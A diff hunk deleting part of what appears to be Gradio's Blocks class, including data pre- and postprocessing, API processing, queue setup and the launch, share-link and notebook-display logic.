- block = self.blocks[input_id]
- except KeyError as e:
- raise InvalidBlockError(
- f"Input component with id {input_id} used in {dependency['trigger']}() event not found in this gr.Blocks context. You are allowed to nest gr.Blocks contexts, but there must be a gr.Blocks context that contains all components and events."
- ) from e
- assert isinstance(
- block, components.Component
- ), f"{block.__class__} Component with id {input_id} not a valid input component."
- if getattr(block, "stateful", False):
- processed_input.append(state.get(input_id))
- else:
- processed_input.append(block.preprocess(inputs[i]))
- else:
- processed_input = inputs
- return processed_input
-
- def validate_outputs(self, fn_index: int, predictions: Any | list[Any]):
- block_fn = self.fns[fn_index]
- dependency = self.dependencies[fn_index]
-
- dep_outputs = dependency["outputs"]
-
- if type(predictions) is not list and type(predictions) is not tuple:
- predictions = [predictions]
-
- if len(predictions) < len(dep_outputs):
- name = (
- f" ({block_fn.name})"
- if block_fn.name and block_fn.name != ""
- else ""
- )
-
- wanted_args = []
- received_args = []
- for output_id in dep_outputs:
- block = self.blocks[output_id]
- wanted_args.append(str(block))
- for pred in predictions:
- v = f'"{pred}"' if isinstance(pred, str) else str(pred)
- received_args.append(v)
-
- wanted = ", ".join(wanted_args)
- received = ", ".join(received_args)
-
- raise ValueError(
- f"""An event handler{name} didn't receive enough output values (needed: {len(dep_outputs)}, received: {len(predictions)}).
-Wanted outputs:
- [{wanted}]
-Received outputs:
- [{received}]"""
- )
-
- def postprocess_data(
- self, fn_index: int, predictions: list | dict, state: dict[int, Any]
- ):
- block_fn = self.fns[fn_index]
- dependency = self.dependencies[fn_index]
- batch = dependency["batch"]
-
- if type(predictions) is dict and len(predictions) > 0:
- predictions = convert_component_dict_to_list(
- dependency["outputs"], predictions
- )
-
- if len(dependency["outputs"]) == 1 and not (batch):
- predictions = [
- predictions,
- ]
-
- self.validate_outputs(fn_index, predictions) # type: ignore
-
- output = []
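-        # FINISHED_ITERATING is the sentinel used when a generator is exhausted;
-        # the matching output is set to None so the component is not updated.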
- for i, output_id in enumerate(dependency["outputs"]):
- try:
- if predictions[i] is components._Keywords.FINISHED_ITERATING:
- output.append(None)
- continue
- except (IndexError, KeyError) as err:
- raise ValueError(
-                        "Number of output components does not match the number "
-                        f"of values returned from function {block_fn.name}"
- ) from err
-
- try:
- block = self.blocks[output_id]
- except KeyError as e:
- raise InvalidBlockError(
- f"Output component with id {output_id} used in {dependency['trigger']}() event not found in this gr.Blocks context. You are allowed to nest gr.Blocks contexts, but there must be a gr.Blocks context that contains all components and events."
- ) from e
-
- if getattr(block, "stateful", False):
- if not utils.is_update(predictions[i]):
- state[output_id] = predictions[i]
- output.append(None)
- else:
- prediction_value = predictions[i]
- if utils.is_update(prediction_value):
- assert isinstance(prediction_value, dict)
- prediction_value = postprocess_update_dict(
- block=block,
- update_dict=prediction_value,
- postprocess=block_fn.postprocess,
- )
- elif block_fn.postprocess:
- assert isinstance(
- block, components.Component
- ), f"{block.__class__} Component with id {output_id} not a valid output component."
- prediction_value = block.postprocess(prediction_value)
- output.append(prediction_value)
-
- return output
-
- async def process_api(
- self,
- fn_index: int,
- inputs: list[Any],
- state: dict[int, Any],
- request: routes.Request | list[routes.Request] | None = None,
- iterators: dict[int, Any] | None = None,
- event_id: str | None = None,
- event_data: EventData | None = None,
- ) -> dict[str, Any]:
- """
- Processes API calls from the frontend. First preprocesses the data,
- then runs the relevant function, then postprocesses the output.
- Parameters:
- fn_index: Index of function to run.
- inputs: input data received from the frontend
- state: data stored from stateful components for session (key is input block id)
- request: the gr.Request object containing information about the network request (e.g. IP address, headers, query parameters, username)
- iterators: the in-progress iterators for each generator function (key is function index)
- event_id: id of event that triggered this API call
- event_data: data associated with the event trigger itself
-        Returns: a dict with the postprocessed output data, generator state ("is_generating", "iterator"), and timing info
- """
- block_fn = self.fns[fn_index]
- batch = self.dependencies[fn_index]["batch"]
-
- if batch:
- max_batch_size = self.dependencies[fn_index]["max_batch_size"]
- batch_sizes = [len(inp) for inp in inputs]
- batch_size = batch_sizes[0]
- if inspect.isasyncgenfunction(block_fn.fn) or inspect.isgeneratorfunction(
- block_fn.fn
- ):
- raise ValueError("Gradio does not support generators in batch mode.")
- if not all(x == batch_size for x in batch_sizes):
- raise ValueError(
- f"All inputs to a batch function must have the same length but instead have sizes: {batch_sizes}."
- )
- if batch_size > max_batch_size:
- raise ValueError(
- f"Batch size ({batch_size}) exceeds the max_batch_size for this function ({max_batch_size})"
- )
-
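-            # Batched payloads arrive as one list per input component; zip(*inputs)
-            # regroups them per sample for preprocessing, and the predictions are
-            # transposed back into per-component lists after postprocessing.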
- inputs = [
- self.preprocess_data(fn_index, list(i), state) for i in zip(*inputs)
- ]
- result = await self.call_function(
- fn_index, list(zip(*inputs)), None, request, event_id, event_data
- )
- preds = result["prediction"]
- data = [
- self.postprocess_data(fn_index, list(o), state) for o in zip(*preds)
- ]
- data = list(zip(*data))
- is_generating, iterator = None, None
- else:
- inputs = self.preprocess_data(fn_index, inputs, state)
- iterator = iterators.get(fn_index, None) if iterators else None
- result = await self.call_function(
- fn_index, inputs, iterator, request, event_id, event_data
- )
- data = self.postprocess_data(fn_index, result["prediction"], state)
- is_generating, iterator = result["is_generating"], result["iterator"]
-
- block_fn.total_runtime += result["duration"]
- block_fn.total_runs += 1
- return {
- "data": data,
- "is_generating": is_generating,
- "iterator": iterator,
- "duration": result["duration"],
- "average_duration": block_fn.total_runtime / block_fn.total_runs,
- }
-
- async def create_limiter(self):
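-        # 40 is the default thread limit inherited from starlette/anyio, so no
-        # custom capacity limiter is needed in that case.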
- self.limiter = (
- None
- if self.max_threads == 40
- else CapacityLimiter(total_tokens=self.max_threads)
- )
-
- def get_config(self):
- return {"type": "column"}
-
- def get_config_file(self):
- config = {
- "version": routes.VERSION,
- "mode": self.mode,
- "dev_mode": self.dev_mode,
- "analytics_enabled": self.analytics_enabled,
- "components": [],
- "css": self.css,
- "title": self.title or "Gradio",
- "space_id": self.space_id,
- "enable_queue": getattr(self, "enable_queue", False), # launch attributes
- "show_error": getattr(self, "show_error", False),
- "show_api": self.show_api,
- "is_colab": utils.colab_check(),
- "stylesheets": self.stylesheets,
- "theme": self.theme.name,
- }
-
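-        # Recursively describe the nested component tree so the frontend can
-        # rebuild the same layout from component ids alone.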
- def get_layout(block):
- if not isinstance(block, BlockContext):
- return {"id": block._id}
- children_layout = []
- for child in block.children:
- children_layout.append(get_layout(child))
- return {"id": block._id, "children": children_layout}
-
- config["layout"] = get_layout(self)
-
- for _id, block in self.blocks.items():
- props = block.get_config() if hasattr(block, "get_config") else {}
- block_config = {
- "id": _id,
- "type": block.get_block_name(),
- "props": utils.delete_none(props),
- }
- serializer = utils.get_serializer_name(block)
- if serializer:
- assert isinstance(block, serializing.Serializable)
- block_config["serializer"] = serializer
- block_config["api_info"] = block.api_info() # type: ignore
- block_config["example_inputs"] = block.example_inputs() # type: ignore
- config["components"].append(block_config)
- config["dependencies"] = self.dependencies
- return config
-
- def __enter__(self):
- if Context.block is None:
- Context.root_block = self
- self.parent = Context.block
- Context.block = self
- self.exited = False
- return self
-
- def __exit__(self, *args):
- super().fill_expected_parents()
- Context.block = self.parent
- # Configure the load events before root_block is reset
- self.attach_load_events()
- if self.parent is None:
- Context.root_block = None
- else:
- self.parent.children.extend(self.children)
- self.config = self.get_config_file()
- self.app = routes.App.create_app(self)
- self.progress_tracking = any(block_fn.tracks_progress for block_fn in self.fns)
- self.exited = True
-
- @class_or_instancemethod
- def load(
- self_or_cls, # noqa: N805
- fn: Callable | None = None,
- inputs: list[Component] | None = None,
- outputs: list[Component] | None = None,
- api_name: str | None | Literal[False] = None,
- scroll_to_output: bool = False,
- show_progress: str = "full",
- queue=None,
- batch: bool = False,
- max_batch_size: int = 4,
- preprocess: bool = True,
- postprocess: bool = True,
- every: float | None = None,
- _js: str | None = None,
- *,
- name: str | None = None,
- src: str | None = None,
- api_key: str | None = None,
- alias: str | None = None,
- **kwargs,
- ) -> Blocks | dict[str, Any] | None:
- """
- For reverse compatibility reasons, this is both a class method and an instance
- method, the two of which, confusingly, do two completely different things.
-
-
- Class method: loads a demo from a Hugging Face Spaces repo and creates it locally and returns a block instance. Warning: this method will be deprecated. Use the equivalent `gradio.load()` instead.
-
-
- Instance method: adds event that runs as soon as the demo loads in the browser. Example usage below.
- Parameters:
- name: Class Method - the name of the model (e.g. "gpt2" or "facebook/bart-base") or space (e.g. "flax-community/spanish-gpt2"), can include the `src` as prefix (e.g. "models/facebook/bart-base")
- src: Class Method - the source of the model: `models` or `spaces` (or leave empty if source is provided as a prefix in `name`)
- api_key: Class Method - optional access token for loading private Hugging Face Hub models or spaces. Find your token here: https://huggingface.co/settings/tokens. Warning: only provide this if you are loading a trusted private Space as it can be read by the Space you are loading.
- alias: Class Method - optional string used as the name of the loaded model instead of the default name (only applies if loading a Space running Gradio 2.x)
- fn: Instance Method - the function to wrap an interface around. Often a machine learning model's prediction function. Each parameter of the function corresponds to one input component, and the function should return a single value or a tuple of values, with each element in the tuple corresponding to one output component.
- inputs: Instance Method - List of gradio.components to use as inputs. If the function takes no inputs, this should be an empty list.
-            outputs: Instance Method - List of gradio.components to use as outputs. If the function returns no outputs, this should be an empty list.
- api_name: Instance Method - Defines how the endpoint appears in the API docs. Can be a string, None, or False. If False, the endpoint will not be exposed in the api docs. If set to None, the endpoint will be exposed in the api docs as an unnamed endpoint, although this behavior will be changed in Gradio 4.0. If set to a string, the endpoint will be exposed in the api docs with the given name.
- scroll_to_output: Instance Method - If True, will scroll to output component on completion
-            show_progress: Instance Method - how to show the progress animation while the event is pending: "full" (default), "minimal", or "hidden"
- queue: Instance Method - If True, will place the request on the queue, if the queue exists
- batch: Instance Method - If True, then the function should process a batch of inputs, meaning that it should accept a list of input values for each parameter. The lists should be of equal length (and be up to length `max_batch_size`). The function is then *required* to return a tuple of lists (even if there is only 1 output component), with each list in the tuple corresponding to one output component.
- max_batch_size: Instance Method - Maximum number of inputs to batch together if this is called from the queue (only relevant if batch=True)
- preprocess: Instance Method - If False, will not run preprocessing of component data before running 'fn' (e.g. leaving it as a base64 string if this method is called with the `Image` component).
- postprocess: Instance Method - If False, will not run postprocessing of component data before returning 'fn' output to the browser.
- every: Instance Method - Run this event 'every' number of seconds. Interpreted in seconds. Queue must be enabled.
- Example:
- import gradio as gr
- import datetime
- with gr.Blocks() as demo:
- def get_time():
- return datetime.datetime.now().time()
- dt = gr.Textbox(label="Current time")
- demo.load(get_time, inputs=None, outputs=dt)
- demo.launch()
- """
- if isinstance(self_or_cls, type):
- warn_deprecation(
- "gr.Blocks.load() will be deprecated. Use gr.load() instead."
- )
- if name is None:
- raise ValueError(
- "Blocks.load() requires passing parameters as keyword arguments"
- )
- return external.load(
- name=name, src=src, hf_token=api_key, alias=alias, **kwargs
- )
- else:
- from gradio.events import Dependency
-
- dep, dep_index = self_or_cls.set_event_trigger(
- event_name="load",
- fn=fn,
- inputs=inputs,
- outputs=outputs,
- api_name=api_name,
- preprocess=preprocess,
- postprocess=postprocess,
- scroll_to_output=scroll_to_output,
- show_progress=show_progress,
- js=_js,
- queue=queue,
- batch=batch,
- max_batch_size=max_batch_size,
- every=every,
- no_target=True,
- )
- return Dependency(self_or_cls, dep, dep_index)
-
- def clear(self):
- """Resets the layout of the Blocks object."""
- self.blocks = {}
- self.fns = []
- self.dependencies = []
- self.children = []
- return self
-
- @document()
- def queue(
- self,
- concurrency_count: int = 1,
- status_update_rate: float | Literal["auto"] = "auto",
- client_position_to_load_data: int | None = None,
- default_enabled: bool | None = None,
- api_open: bool = True,
- max_size: int | None = None,
- ):
- """
- You can control the rate of processed requests by creating a queue. This will allow you to set the number of requests to be processed at one time, and will let users know their position in the queue.
- Parameters:
- concurrency_count: Number of worker threads that will be processing requests from the queue concurrently. Increasing this number will increase the rate at which requests are processed, but will also increase the memory usage of the queue.
- status_update_rate: If "auto", Queue will send status estimations to all clients whenever a job is finished. Otherwise Queue will send status at regular intervals set by this parameter as the number of seconds.
-            client_position_to_load_data: DEPRECATED. This parameter has no effect.
- default_enabled: Deprecated and has no effect.
- api_open: If True, the REST routes of the backend will be open, allowing requests made directly to those endpoints to skip the queue.
- max_size: The maximum number of events the queue will store at any given moment. If the queue is full, new events will not be added and a user will receive a message saying that the queue is full. If None, the queue size will be unlimited.
- Example: (Blocks)
- with gr.Blocks() as demo:
- button = gr.Button(label="Generate Image")
- button.click(fn=image_generator, inputs=gr.Textbox(), outputs=gr.Image())
- demo.queue(concurrency_count=3)
- demo.launch()
- Example: (Interface)
- demo = gr.Interface(image_generator, gr.Textbox(), gr.Image())
- demo.queue(concurrency_count=3)
- demo.launch()
- """
- if default_enabled is not None:
- warn_deprecation(
- "The default_enabled parameter of queue has no effect and will be removed "
- "in a future version of gradio."
- )
- self.enable_queue = True
- self.api_open = api_open
- if client_position_to_load_data is not None:
- warn_deprecation(
- "The client_position_to_load_data parameter is deprecated."
- )
- max_size_default = self.max_threads if utils.is_zero_gpu_space() else None
- self._queue = queueing.Queue(
- live_updates=status_update_rate == "auto",
- concurrency_count=concurrency_count,
- update_intervals=status_update_rate if status_update_rate != "auto" else 1,
- max_size=max_size_default if max_size is None else max_size,
- blocks_dependencies=self.dependencies,
- )
- self.config = self.get_config_file()
- self.app = routes.App.create_app(self)
- return self
-
- def validate_queue_settings(self):
- if not self.enable_queue and self.progress_tracking:
- raise ValueError("Progress tracking requires queuing to be enabled.")
-
- for fn_index, dep in enumerate(self.dependencies):
- if not self.enable_queue and self.queue_enabled_for_fn(fn_index):
- raise ValueError(
- f"The queue is enabled for event {dep['api_name'] if dep['api_name'] else fn_index} "
- "but the queue has not been enabled for the app. Please call .queue() "
- "on your app. Consult https://gradio.app/docs/#blocks-queue for information on how "
- "to configure the queue."
- )
- for i in dep["cancels"]:
- if not self.queue_enabled_for_fn(i):
- raise ValueError(
- "Queue needs to be enabled! "
- "You may get this error by either 1) passing a function that uses the yield keyword "
- "into an interface without enabling the queue or 2) defining an event that cancels "
- "another event without enabling the queue. Both can be solved by calling .queue() "
- "before .launch()"
- )
- if dep["batch"] and (
- dep["queue"] is False
- or (dep["queue"] is None and not self.enable_queue)
- ):
- raise ValueError("In order to use batching, the queue must be enabled.")
-
- def launch(
- self,
- inline: bool | None = None,
- inbrowser: bool = False,
- share: bool | None = None,
- debug: bool = False,
- enable_queue: bool | None = None,
- max_threads: int = 40,
- auth: Callable | tuple[str, str] | list[tuple[str, str]] | None = None,
- auth_message: str | None = None,
- prevent_thread_lock: bool = False,
- show_error: bool = False,
- server_name: str | None = None,
- server_port: int | None = None,
- show_tips: bool = False,
- height: int = 500,
- width: int | str = "100%",
- encrypt: bool | None = None,
- favicon_path: str | None = None,
- ssl_keyfile: str | None = None,
- ssl_certfile: str | None = None,
- ssl_keyfile_password: str | None = None,
- ssl_verify: bool = True,
- quiet: bool = False,
- show_api: bool = True,
- file_directories: list[str] | None = None,
- allowed_paths: list[str] | None = None,
- blocked_paths: list[str] | None = None,
- root_path: str = "",
- _frontend: bool = True,
- app_kwargs: dict[str, Any] | None = None,
- ) -> tuple[FastAPI, str, str]:
- """
- Launches a simple web server that serves the demo. Can also be used to create a
- public link used by anyone to access the demo from their browser by setting share=True.
-
- Parameters:
- inline: whether to display in the interface inline in an iframe. Defaults to True in python notebooks; False otherwise.
- inbrowser: whether to automatically launch the interface in a new tab on the default browser.
- share: whether to create a publicly shareable link for the interface. Creates an SSH tunnel to make your UI accessible from anywhere. If not provided, it is set to False by default every time, except when running in Google Colab. When localhost is not accessible (e.g. Google Colab), setting share=False is not supported.
- debug: if True, blocks the main thread from running. If running in Google Colab, this is needed to print the errors in the cell output.
- auth: If provided, username and password (or list of username-password tuples) required to access interface. Can also provide function that takes username and password and returns True if valid login.
- auth_message: If provided, HTML message provided on login page.
-            prevent_thread_lock: By default, the server blocks the main thread while it is running. If True, the server will not block and the main thread will continue executing (the server terminates as soon as the script finishes).
- show_error: If True, any errors in the interface will be displayed in an alert modal and printed in the browser console log
- server_port: will start gradio app on this port (if available). Can be set by environment variable GRADIO_SERVER_PORT. If None, will search for an available port starting at 7860.
- server_name: to make app accessible on local network, set this to "0.0.0.0". Can be set by environment variable GRADIO_SERVER_NAME. If None, will use "127.0.0.1".
- show_tips: if True, will occasionally show tips about new Gradio features
- enable_queue: DEPRECATED (use .queue() method instead.) if True, inference requests will be served through a queue instead of with parallel threads. Required for longer inference times (> 1min) to prevent timeout. The default option in HuggingFace Spaces is True. The default option elsewhere is False.
-            max_threads: the maximum number of total threads that the Gradio app can generate in parallel. The default is inherited from the starlette library (currently 40). Applies whether the queue is enabled or not. But if queuing is enabled, this parameter is increased to be at least the concurrency_count of the queue.
- width: The width in pixels of the iframe element containing the interface (used if inline=True)
- height: The height in pixels of the iframe element containing the interface (used if inline=True)
- encrypt: DEPRECATED. Has no effect.
- favicon_path: If a path to a file (.png, .gif, or .ico) is provided, it will be used as the favicon for the web page.
- ssl_keyfile: If a path to a file is provided, will use this as the private key file to create a local server running on https.
- ssl_certfile: If a path to a file is provided, will use this as the signed certificate for https. Needs to be provided if ssl_keyfile is provided.
- ssl_keyfile_password: If a password is provided, will use this with the ssl certificate for https.
- ssl_verify: If False, skips certificate validation which allows self-signed certificates to be used.
- quiet: If True, suppresses most print statements.
- show_api: If True, shows the api docs in the footer of the app. Default True. If the queue is enabled, then api_open parameter of .queue() will determine if the api docs are shown, independent of the value of show_api.
- file_directories: This parameter has been renamed to `allowed_paths`. It will be removed in a future version.
- allowed_paths: List of complete filepaths or parent directories that gradio is allowed to serve (in addition to the directory containing the gradio python file). Must be absolute paths. Warning: if you provide directories, any files in these directories or their subdirectories are accessible to all users of your app.
- blocked_paths: List of complete filepaths or parent directories that gradio is not allowed to serve (i.e. users of your app are not allowed to access). Must be absolute paths. Warning: takes precedence over `allowed_paths` and all other directories exposed by Gradio by default.
- root_path: The root path (or "mount point") of the application, if it's not served from the root ("/") of the domain. Often used when the application is behind a reverse proxy that forwards requests to the application. For example, if the application is served at "https://example.com/myapp", the `root_path` should be set to "/myapp".
- app_kwargs: Additional keyword arguments to pass to the underlying FastAPI app as a dictionary of parameter keys and argument values. For example, `{"docs_url": "/docs"}`
- Returns:
- app: FastAPI app object that is running the demo
- local_url: Locally accessible link to the demo
- share_url: Publicly accessible link to the demo (if share=True, otherwise None)
- Example: (Blocks)
- import gradio as gr
- def reverse(text):
- return text[::-1]
- with gr.Blocks() as demo:
- button = gr.Button(value="Reverse")
- button.click(reverse, gr.Textbox(), gr.Textbox())
- demo.launch(share=True, auth=("username", "password"))
- Example: (Interface)
- import gradio as gr
- def reverse(text):
- return text[::-1]
- demo = gr.Interface(reverse, "text", "text")
- demo.launch(share=True, auth=("username", "password"))
- """
- if not self.exited:
- self.__exit__()
-
- self.dev_mode = False
- if (
- auth
- and not callable(auth)
- and not isinstance(auth[0], tuple)
- and not isinstance(auth[0], list)
- ):
- self.auth = [auth]
- else:
- self.auth = auth
- self.auth_message = auth_message
- self.show_tips = show_tips
- self.show_error = show_error
- self.height = height
- self.width = width
- self.favicon_path = favicon_path
- self.ssl_verify = ssl_verify
- self.root_path = root_path
-
- if enable_queue is not None:
- self.enable_queue = enable_queue
- warn_deprecation(
- "The `enable_queue` parameter has been deprecated. "
- "Please use the `.queue()` method instead.",
- )
- if encrypt is not None:
- warn_deprecation(
- "The `encrypt` parameter has been deprecated and has no effect.",
- )
-
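-        # On Hugging Face Spaces the queue defaults to enabled; elsewhere it stays
-        # off unless explicitly requested via enable_queue or .queue().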
- if self.space_id:
- self.enable_queue = self.enable_queue is not False
- else:
- self.enable_queue = self.enable_queue is True
- if self.enable_queue and not hasattr(self, "_queue"):
- self.queue()
- self.show_api = self.api_open if self.enable_queue else show_api
-
- if file_directories is not None:
- warn_deprecation(
- "The `file_directories` parameter has been renamed to `allowed_paths`. "
- "Please use that instead.",
- )
- if allowed_paths is None:
- allowed_paths = file_directories
- self.allowed_paths = allowed_paths or []
- self.blocked_paths = blocked_paths or []
-
- if not isinstance(self.allowed_paths, list):
- raise ValueError("`allowed_paths` must be a list of directories.")
- if not isinstance(self.blocked_paths, list):
- raise ValueError("`blocked_paths` must be a list of directories.")
-
- self.validate_queue_settings()
-
- self.config = self.get_config_file()
- self.max_threads = max(
- self._queue.max_thread_count if self.enable_queue else 0, max_threads
- )
-
- if self.is_running:
- assert isinstance(
- self.local_url, str
- ), f"Invalid local_url: {self.local_url}"
- if not (quiet):
- print(
- "Rerunning server... use `close()` to stop if you need to change `launch()` parameters.\n----"
- )
- else:
- if wasm_utils.IS_WASM:
- server_name = "xxx"
- server_port = 99999
- local_url = ""
- server = None
-
- # In the Wasm environment, we only need the app object
- # which the frontend app will directly communicate with through the Worker API,
- # and we don't need to start a server.
- # So we just create the app object and register it here,
-                # and avoid calling `networking.start_server`, which doesn't work in the Wasm env.
- from gradio.routes import App
-
- app = App.create_app(self, app_kwargs=app_kwargs)
- wasm_utils.register_app(app)
- else:
- (
- server_name,
- server_port,
- local_url,
- app,
- server,
- ) = networking.start_server(
- self,
- server_name,
- server_port,
- ssl_keyfile,
- ssl_certfile,
- ssl_keyfile_password,
- app_kwargs=app_kwargs,
- )
- self.server_name = server_name
- self.local_url = local_url
- self.server_port = server_port
- self.server_app = app
- self.server = server
- self.is_running = True
- self.is_colab = utils.colab_check()
- self.is_kaggle = utils.kaggle_check()
-
- self.protocol = (
- "https"
- if self.local_url.startswith("https") or self.is_colab
- else "http"
- )
- if not self.is_colab:
- print(
- strings.en["RUNNING_LOCALLY_SEPARATED"].format(
- self.protocol, self.server_name, self.server_port
- )
- )
-
- if self.enable_queue:
- self._queue.set_url(self.local_url)
-
- # Cannot run async functions in background other than app's scope.
- # Workaround by triggering the app endpoint
- if not wasm_utils.IS_WASM:
- requests.get(f"{self.local_url}startup-events", verify=ssl_verify)
-
- if wasm_utils.IS_WASM:
- return TupleNoPrint((self.server_app, self.local_url, self.share_url))
-
- utils.launch_counter()
- self.is_sagemaker = utils.sagemaker_check()
- if share is None:
- if self.is_colab and self.enable_queue:
- if not quiet:
- print(
- "Setting queue=True in a Colab notebook requires sharing enabled. Setting `share=True` (you can turn this off by setting `share=False` in `launch()` explicitly).\n"
- )
- self.share = True
- elif self.is_kaggle:
- if not quiet:
- print(
- "Kaggle notebooks require sharing enabled. Setting `share=True` (you can turn this off by setting `share=False` in `launch()` explicitly).\n"
- )
- self.share = True
- elif self.is_sagemaker:
- if not quiet:
- print(
- "Sagemaker notebooks may require sharing enabled. Setting `share=True` (you can turn this off by setting `share=False` in `launch()` explicitly).\n"
- )
- self.share = True
- else:
- self.share = False
- else:
- self.share = share
-
- # If running in a colab or not able to access localhost,
- # a shareable link must be created.
- if _frontend and (not networking.url_ok(self.local_url)) and (not self.share):
- raise ValueError(
- "When localhost is not accessible, a shareable link must be created. Please set share=True or check your proxy settings to allow access to localhost."
- )
-
- if self.is_colab:
- if not quiet:
- if debug:
- print(strings.en["COLAB_DEBUG_TRUE"])
- else:
- print(strings.en["COLAB_DEBUG_FALSE"])
- if not self.share:
- print(strings.en["COLAB_WARNING"].format(self.server_port))
- if self.enable_queue and not self.share:
- raise ValueError(
- "When using queueing in Colab, a shareable link must be created. Please set share=True."
- )
-
- if self.share:
- if self.space_id:
- raise RuntimeError("Share is not supported when you are in Spaces")
- try:
- if self.share_url is None:
- self.share_url = networking.setup_tunnel(
- self.server_name, self.server_port, self.share_token
- )
- print(strings.en["SHARE_LINK_DISPLAY"].format(self.share_url))
- if not (quiet):
- print(strings.en["SHARE_LINK_MESSAGE"])
- except (RuntimeError, requests.exceptions.ConnectionError):
- if self.analytics_enabled:
- analytics.error_analytics("Not able to set up tunnel")
- self.share_url = None
- self.share = False
- if Path(BINARY_PATH).exists():
- print(strings.en["COULD_NOT_GET_SHARE_LINK"])
- else:
- print(
- strings.en["COULD_NOT_GET_SHARE_LINK_MISSING_FILE"].format(
- BINARY_PATH,
- BINARY_URL,
- BINARY_FILENAME,
- BINARY_FOLDER,
- )
- )
- else:
- if not (quiet):
- print(strings.en["PUBLIC_SHARE_TRUE"])
- self.share_url = None
-
- if inbrowser:
- link = self.share_url if self.share and self.share_url else self.local_url
- webbrowser.open(link)
-
- # Check if running in a Python notebook in which case, display inline
- if inline is None:
- inline = utils.ipython_check()
- if inline:
- try:
- from IPython.display import HTML, Javascript, display # type: ignore
-
- if self.share and self.share_url:
- while not networking.url_ok(self.share_url):
- time.sleep(0.25)
- display(
- HTML(
-                            f'<div><iframe src="{self.share_url}" width="{self.width}" height="{self.height}" allow="autoplay; camera; microphone; clipboard-read; clipboard-write;" frameborder="0" allowfullscreen></iframe></div>'
- )
- )
- elif self.is_colab:
- # modified from /usr/local/lib/python3.7/dist-packages/google/colab/output/_util.py within Colab environment
- code = """(async (port, path, width, height, cache, element) => {
- if (!google.colab.kernel.accessAllowed && !cache) {
- return;
- }
- element.appendChild(document.createTextNode(''));
- const url = await google.colab.kernel.proxyPort(port, {cache});
-
- const external_link = document.createElement('div');
-                    external_link.innerHTML = `Running on <a href=${new URL(path, url).toString()} target="_blank">https://localhost:${port}${path}</a>`;
- element.appendChild(external_link);
-
- const iframe = document.createElement('iframe');
- iframe.src = new URL(path, url).toString();
- iframe.height = height;
- iframe.allow = "autoplay; camera; microphone; clipboard-read; clipboard-write;"
- iframe.width = width;
- iframe.style.border = 0;
- element.appendChild(iframe);
- })""" + "({port}, {path}, {width}, {height}, {cache}, window.element)".format(
- port=json.dumps(self.server_port),
- path=json.dumps("/"),
- width=json.dumps(self.width),
- height=json.dumps(self.height),
- cache=json.dumps(False),
- )
-
- display(Javascript(code))
- else:
- display(
- HTML(
-                            f'<div><iframe src="{self.local_url}" width="{self.width}" height="{self.height}" allow="autoplay; camera; microphone; clipboard-read; clipboard-write;" frameborder="0" allowfullscreen></iframe></div>'
- )
- )
- except ImportError:
- pass
-
- if getattr(self, "analytics_enabled", False):
- data = {
- "launch_method": "browser" if inbrowser else "inline",
- "is_google_colab": self.is_colab,
- "is_sharing_on": self.share,
- "share_url": self.share_url,
- "enable_queue": self.enable_queue,
- "show_tips": self.show_tips,
- "server_name": server_name,
- "server_port": server_port,
- "is_space": self.space_id is not None,
- "mode": self.mode,
- }
- analytics.launched_analytics(self, data)
-
- utils.show_tip(self)
-
- # Block main thread if debug==True
- if debug or int(os.getenv("GRADIO_DEBUG", 0)) == 1:
- self.block_thread()
- # Block main thread if running in a script to stop script from exiting
- is_in_interactive_mode = bool(getattr(sys, "ps1", sys.flags.interactive))
-
- if not prevent_thread_lock and not is_in_interactive_mode:
- self.block_thread()
-
- return TupleNoPrint((self.server_app, self.local_url, self.share_url))
-
- def integrate(
- self,
- comet_ml=None,
- wandb: ModuleType | None = None,
- mlflow: ModuleType | None = None,
- ) -> None:
- """
- A catch-all method for integrating with other libraries. This method should be run after launch()
- Parameters:
- comet_ml: If a comet_ml Experiment object is provided, will integrate with the experiment and appear on Comet dashboard
- wandb: If the wandb module is provided, will integrate with it and appear on WandB dashboard
- mlflow: If the mlflow module is provided, will integrate with the experiment and appear on ML Flow dashboard
- """
- analytics_integration = ""
- if comet_ml is not None:
- analytics_integration = "CometML"
- comet_ml.log_other("Created from", "Gradio")
- if self.share_url is not None:
- comet_ml.log_text(f"gradio: {self.share_url}")
- comet_ml.end()
- elif self.local_url:
- comet_ml.log_text(f"gradio: {self.local_url}")
- comet_ml.end()
- else:
- raise ValueError("Please run `launch()` first.")
- if wandb is not None:
- analytics_integration = "WandB"
- if self.share_url is not None:
- wandb.log(
- {
- "Gradio panel": wandb.Html(
-                            '<iframe src="' + self.share_url + '" width="' + str(self.width) + '" height="' + str(self.height) + '" frameBorder="0"></iframe>'
- )
- }
- )
- else:
- print(
- "The WandB integration requires you to "
- "`launch(share=True)` first."
- )
- if mlflow is not None:
- analytics_integration = "MLFlow"
- if self.share_url is not None:
- mlflow.log_param("Gradio Interface Share Link", self.share_url)
- else:
- mlflow.log_param("Gradio Interface Local Link", self.local_url)
- if self.analytics_enabled and analytics_integration:
- data = {"integration": analytics_integration}
- analytics.integration_analytics(data)
-
- def close(self, verbose: bool = True) -> None:
- """
- Closes the Interface that was launched and frees the port.
- """
- try:
- if self.enable_queue:
- self._queue.close()
- if self.server:
- self.server.close()
- self.is_running = False
- # So that the startup events (starting the queue)
- # happen the next time the app is launched
- self.app.startup_events_triggered = False
- if verbose:
- print(f"Closing server running on port: {self.server_port}")
- except (AttributeError, OSError): # can't close if not running
- pass
-
- def block_thread(
- self,
- ) -> None:
- """Block main thread until interrupted by user."""
- try:
- while True:
- time.sleep(0.1)
- except (KeyboardInterrupt, OSError):
- print("Keyboard interruption in main thread... closing server.")
- if self.server:
- self.server.close()
- for tunnel in CURRENT_TUNNELS:
- tunnel.kill()
-
- def attach_load_events(self):
- """Add a load event for every component whose initial value should be randomized."""
- if Context.root_block:
- for component in Context.root_block.blocks.values():
- if (
- isinstance(component, components.IOComponent)
- and component.load_event_to_attach
- ):
- load_fn, every = component.load_event_to_attach
- # Use set_event_trigger to avoid ambiguity between load class/instance method
- dep = self.set_event_trigger(
- "load",
- load_fn,
- None,
- component,
- no_target=True,
-                        # If every is None, skip the queue for sure;
-                        # otherwise, let the enable_queue parameter take precedence.
-                        # This will raise a helpful error message if every is used
-                        # without the queue enabled.
- queue=False if every is None else None,
- every=every,
- )[0]
- component.load_event = dep
-
- def startup_events(self):
- """Events that should be run when the app containing this block starts up."""
-
- if self.enable_queue:
- utils.run_coro_in_background(self._queue.start, self.ssl_verify)
- # So that processing can resume in case the queue was stopped
- self._queue.stopped = False
- utils.run_coro_in_background(self.create_limiter)
-
- def queue_enabled_for_fn(self, fn_index: int):
- if self.dependencies[fn_index]["queue"] is None:
- return self.enable_queue
- return self.dependencies[fn_index]["queue"]
